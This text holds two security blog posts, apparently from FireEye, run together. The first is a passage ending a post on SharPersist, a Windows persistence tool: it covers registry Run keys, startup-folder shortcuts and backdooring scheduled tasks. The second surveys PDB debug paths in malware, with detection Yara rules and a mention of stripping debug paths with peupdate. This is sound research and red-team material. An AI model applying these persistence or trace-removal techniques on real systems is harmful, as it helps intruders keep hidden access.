startupfolder

No

No

Yes

Tortoise SVN

Creates Tortoise SVN hook script

tortoisesvn

No

Yes

No

Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Registry Key Code (-k)

Registry Key

Registry Value

Admin Privileges Required?

Supports Env Optional Add-On (-o env)?

hklmrun

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

User supplied

Yes

Yes

hklmrunonce

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

User supplied

Yes

Yes

hklmrunonceex

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

User supplied

Yes

Yes

userinit

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Userinit

Yes

No

hkcurun

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

User supplied

No

Yes

hkcurunonce

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

User supplied

No

Yes

logonscript

HKCU\Environment

UserInitMprLogonScript

No

No

stickynotes

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

RESTART_STICKY_NOTES

No

No

Figure 4: Supported registry keys table

In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.


Figure 5: Adding registry persistence

Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed.


Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7.


Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder.


Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.


Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10.


Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.


Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.


Figure 12: Removing backdoored scheduled task action

Conclusion

Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike.

This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab and answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project Visual Studio in a default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During the compilation, the linker program associates the PDB file with the built executable by adding an entry into the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView and so the PDB path is embedded under IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file Test.pdb while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type

Description

DWORD

"RSDS" header

GUID

16-byte Globally Unique Identifier

DWORD

"age" (incrementing # of revisions)

BYTE

PDB path, null terminated

Figure 7: Structure of CodeView debug directory information

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths, those that are fully qualified directory paths and those that are partially qualified, that specify the name of the PDB file only. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths, with represented malware families and threat groups where at least one sample has the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Keyword

Families and Groups Observed

Example PDB Path

anti

RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER
APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765

H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

attack

 

MINIASP, SANNY, DIRTCHEAP, ORCUSRAT
APT1, UNC776, UNC251. UNC1131

 

E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

backdoor

PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN

APT41, APT34, APT37, UNC52, UNC1131, APT40

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

 

bind

 

SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE

UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822

C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

bypass

 

POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU

APT10, APT34, APT21, UNC1289, UNC1450

C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

downloader

 

SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS

APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031

Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

dropper

 

CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF

UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849

D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

exploit

 

TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT

UNC1030, APT39, APT34, FIN6

w:\modules\exploits\littletools\agent_wrapper\release\
12345678901234567890123456789012345678\wrapper3.pdb

fake

 

FIRESHADOW

UNC1172, APT39, UNC822

D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

 

fuck

 

TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN

APT17, UNC208, UNC276

E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

 

hack

 

PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL

UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8

C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

 

hide

 

FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL

APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282

c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

hook

 

GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN

UNC842, UNC1197, UNC1040, UNC969

D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

 

inject

 

SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE

UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575

E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

install

 

FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, EXCHAIN, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL

UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53

i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

keylog

 

LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE

APT37, UNC82, UNC1095, APT1, APT40

D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

payload

 

POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE

UNC915, UNC632, UNC1149, APT28, UNC878

C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

 

shell

 

SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH

UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559

E:\windows\dropperNew\Debug\testShellcode.pdb

sleep

 

URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID

FIN7

O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\
src\sdb_test_dll\x64\Release\sdb_test.pdb

spy

 

DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR

FIN7, UNC583, UNC822, UNC1120

G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

trojan

 

ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT

UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559

e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable is compiled in a non-enterprise setting. For example, any PDB path containing “Users” directory can tell you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker or lower in fidelity than “shellcode” but as we demonstrate below, these terms are indeed present in lots of malware and can be used for weak detection signals.

PDB Path Term Prevalence

Term

Families and Groups Observed

Example PDB Path

Users

ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS

APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562

C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

ConsoleApplication

WindowsApplication

WindowsFormsApplication

 

(Visual Studio default project names)

CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW

APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507

D:\Projects\ByPassAV\ConsoleApplication1\
Release\ConsoleApplication1.pdb

New Folder

HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE

APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559

c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Copy

DESERTFALCON, KASPER, NJRAT, RYUK, SOGU

UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289

D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Desktop

AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT

APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352

C:\Users\Develop_MM\Desktop\sc_loader\
Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered on a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables, and is likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry, and if it is zero we can presume that there is no debug entry and thus the presence of a CodeView PDB path indicates that there is a subfile.

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
   strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
   condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe out debug artifacts from executables. One stellar example of this is “peupdate” which is designed not only to strip or fabricate the PDB path information, but can also recalculate the checksum, and eliminate Rich headers.  Below we demonstrate use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Anomaly

Families and Groups Observed

Examples

Non-Ascii Characters

008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL
APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT24, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969

I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Multi Path in Single File

AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL

APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495

Single Sample of TRICKBOT:

D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

 

Outside of Debug Section

ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL

APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

 

Nulled Out PDB Paths

